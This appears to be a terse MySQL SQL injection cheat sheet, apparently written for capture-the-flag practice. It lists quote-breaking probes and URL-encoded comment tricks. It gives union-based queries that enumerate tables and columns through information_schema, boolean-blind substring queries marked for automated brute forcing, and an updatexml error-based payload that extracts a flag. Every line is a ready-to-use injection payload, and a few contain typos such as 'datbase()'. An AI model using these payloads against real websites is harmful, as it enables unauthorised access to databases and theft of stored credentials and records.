MySQL
?id= 1 '
?id=1"
?id=''
?id=""
?id=")
?id=' )
?id= 3 - 1
% 20
% 23
limit 1 , 1
limit 0 , 1
database ( )
substr( [ str] , [ start ] , [ length] )
substring( )
concat( str1, str2, . . . )
比如:concat( username, 0x7e , password)
group_concat( )
mid ( [ column name] , start , [ length] )
updatexml( [ document] , [ XPath] , [ value ] )
eg: information_schema. tables
id= '1' order by 3
id= '2' and 1 = 2 union select 1 , 2 , datbase( )
id= '3' and 1 = 2 union select 1 , 2 , group_concat( table_name) from information_schema. tables where table_schema= database ( )
id= '4' and 1 = 2 union select 1 , 2 , group_concat( column_name) from information_schema. columns where table_schema= database ( )
id= '5' and 1 = 2 union select 1 , 2 , [ column name] from [ table name]
name= 'admin' + and + if ( length( database ( ) ) = [ number] , true , false ) % 23
name= 'admin' + and + substr( database ( ) , $1 $, 1 ) = '$f$' % 23
name= 'admin' + AND + substr( ( SELECT + group_concat( table_name) + FROM + information_schema. tables + WHERE + table_schema= database ( ) ) , $1 $, 1 ) = '$a$' % 23
name= 'admin' + AND + substr( ( SELECT + group_concat( column_name) + FROM + information_schema. columns + WHERE + table_schema= database ( ) ) , $1 $, 1 ) = '$a$' % 23
named= 'admin' + AND + substr( ( SELECT + group_concat( [ column name] ) + FROM + [ table name] ) , 1 , 1 ) = 'a' % 23
name= admin'+ or + updatexml( 1 , concat( 0x7e , ( select + flag+ from + fl4g) ) , 1 ) % 23